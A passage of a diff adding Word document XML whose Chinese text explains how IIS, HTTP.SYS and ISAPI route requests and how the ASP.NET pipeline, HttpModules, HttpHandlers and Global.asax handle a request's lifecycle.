+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>我们先来了解下第2点中的HTTP.SYS服务到底是个什么东西，它其实是一个服务器内置驱动程序，用来监听来自外部的HTTP请求，在操作系统启动时IIS服务器首先就要在HTTP.SYS中注册自己的虚拟路径，其实是告知HTTP.SYS请求的URL是否可以访问，能访问则交给IIS，不能则返回404错误。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>接下来解释下第4点中IIS是依据什么来处理请求的，答案就是请求文件的后缀名，能够处理各种后缀名的应用程序被叫做ISAPI（Internet Server Application Programe Interface，互联网服务器应用程序接口）应用程序，它其实是一个接口，扮演一个代理的角色，映射请求的页面的后缀和与之对应的应用程序。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="1440"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:spacing w:val="1"/>
+          <w:szCs w:val="18"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="0070C0"/>
+          <w:spacing w:val="1"/>
+        </w:rPr>
+        <w:t>ASP.NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="0070C0"/>
+          <w:spacing w:val="1"/>
+        </w:rPr>
+        <w:t>管道</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:spacing w:val="1"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:spacing w:val="1"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>上面是在比较低的层次上讲到的IIS和asp.net框架所完成的工作，那我们写的代码（高层次框架，如WebForm、MVC、WebAPI等）是如何和这部分进行衔接的呢？当Http请求到达asp.net runtime时，交由管道来处理，管道由托管模块（各种HttpModule）和处理程序（各种HttpHandler）组成，控制管道工作的是HttpApplication，下面是管道处理的一个图：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:spacing w:val="1"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4905375" cy="3552825"/>
+            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
+            <wp:docPr id="14" name="图片 7" descr="6364082606634756423503037.gif"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="6364082606634756423503037.gif"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29" cstate="print"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4905375" cy="3552825"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="173"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>HttpRuntime将请求转交给HttpApplication（表示Web应用程序），HttpApplication创建针对Http请求的HttpContext对象，这些对象包含如HttpRequest、HttpResponse等对象， 这些对象在程序中可以通过上下文类进行访问。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="173"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>接下来Http请求会通过一系列的HttpModule，这些Module对Http请求具有完全控制权，可以做一些执行某个实际工作前的事情。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="173"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>接来下会被HttpHandler处理，如webForm中的aspx页面继承的page类就是实现了IHttpHandler接口，mvc中则是交给MvcHandler处理。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="173"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>HttpHandler处理完成后，Http请求会再次回到Module，此时Module则可以做一些某个实际工作完成后的事情。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:spacing w:val="1"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>请求在管道中要经过一系列的事件，这些事件由HttpApplication引发，通常由HttpModule订阅，也可以在全局类Global.asax中订阅，这一系列的事件就是一次请求的生命周期。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="4320"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5274310" cy="3905885"/>
+            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
+            <wp:docPr id="10" name="图片 9" descr="6364126633124959076796356.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="6364126633124959076796356.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId30" cstate="print"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="3905885"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="4320"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>HttpModule</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>内部事件机制和生命周期</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="4320"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5274310" cy="3782695"/>
+            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
+            <wp:docPr id="11" name="图片 10" descr="6364126633853572074804770.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="6364126633853572074804770.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId31" cstate="print"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="3782695"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="4320"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="4320"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>附上中文详细解释图：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="4320"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5274310" cy="5274310"/>
+            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
+            <wp:docPr id="12" name="图片 11" descr="HttpModuleHandler.gif"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="HttpModuleHandler.gif"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId32" cstate="print"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="5274310"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="4320"/>
+        </w:tabs>
+        <w:spacing w:line="480" w:lineRule="auto"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ASP.NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>全局文件</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>GLOBAL.ASAX</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>用法</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="4320"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:color w:val="4F4F4F"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Global.asax</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>文件继承自</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">HttpApplication </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>类，它维护一个</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">HttpApplication </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>对象池，并在需要时将对象池中的对象分配给应用程序</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:wordWrap w:val="0"/>
+        <w:spacing w:after="240" w:line="390" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
